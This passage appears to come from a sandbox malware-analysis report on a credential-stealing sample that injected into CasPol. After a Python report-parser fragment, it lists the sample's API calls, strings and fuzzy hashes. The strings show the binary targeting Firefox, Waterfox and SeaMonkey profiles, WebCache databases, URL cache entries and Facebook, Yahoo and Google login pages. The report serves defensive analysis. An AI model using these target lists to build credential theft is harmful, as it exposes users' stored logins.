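                cur.subcall_apis.append((sub["fn"], hit["api"], hit["mod"], hit["ref"]))
            continue
        hit = API_RE.match(line)
        if hit:
            cur.apis.append((hit["api"], hit["mod"], hit["ref"]))
            continue
        kv = KV_RE.match(line)
        if not kv:
            continue
        key, val = kv["key"].strip(), kv["val"].strip()
        if key == "String ID":
            cur.strings = [s for s in val.split("$") if s]
        else:
            cur.meta[key] = val
        if key == "Instruction Fuzzy Hash":   # last field of every block on this page
            cur.tags = tag_function(cur)
            records.append(cur)
            cur = FunctionRecord()
    return records


if __name__ == "__main__":
    for rec in parse_report(REPORT):
        print(sorted(rec.api_names()), rec.strings, rec.tags, rec.fuzzy_hash[:16])
```

Run as a script it prints one line per function. The fuzzy-hash field is the value to search for in the other memory-dump sections of the same report when the same routine shows up in a second process, and the tags are only as reliable as the rules in `tag_function`, which need extending per campaign rather than being treated as a fixed taxonomy.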

Control-flow Graph (rendered graph not captured; node list recovered from the graph data as node: address range, calls/APIs -> successor nodes)
747: 40d134-40d13b -> 748, 749
748: 40d142-40d14e -> 751, 752
749: 40d13d call 40d092 -> 748
751: 40d160 -> 753
752: 40d150-40d159 -> 754, 755
753: 40d162-40d164 -> 756, 757
754: 40d15b-40d15e -> 751, 752
755: 40d18d-40d19f -> 753
756: 40d295 -> 760
757: 40d16a-40d170 -> 758, 759
758: 40d1a1-40d1a9 -> 762, 763
759: 40d172-40d18b GetModuleHandleW -> 761
760: 40d297-40d299 (no successors, function exit)
761: 40d20b-40d214 LoadStringW -> 766
762: 40d1f8-40d206 call 40d29a -> 761
763: 40d1ab-40d1cb wcscpy, call 40d626 -> 770, 771
766: 40d216 -> 768, 769
768: 40d218-40d227 -> 769, 772
769: 40d28e-40d293 -> 760
770: 40d1cd-40d1dd wcslen -> 766, 771
771: 40d1df-40d1f6 GetModuleHandleW -> 761
772: 40d229-40d235 -> 769, 773
773: 40d237-40d28c memcpy -> 756, 769
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
• Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-11920434
                                                                                                                                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-2068335096
                                                                                                                                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
Strings
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
APIs
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
• memset.MSVCRT ref: 00414C87
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 71295984-2036018995
• Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
• Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
APIs
• wcschr.MSVCRT ref: 00414458
• _snwprintf.MSVCRT ref: 0041447D
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
• Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
• Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
• Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
• Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
• GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
• GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
• Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
• Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
• Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
• Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
• Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
• Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
• Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
• Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
• Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
• Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
• Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
• Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2887208581-2114579845
• Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
• Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
• Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
• Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
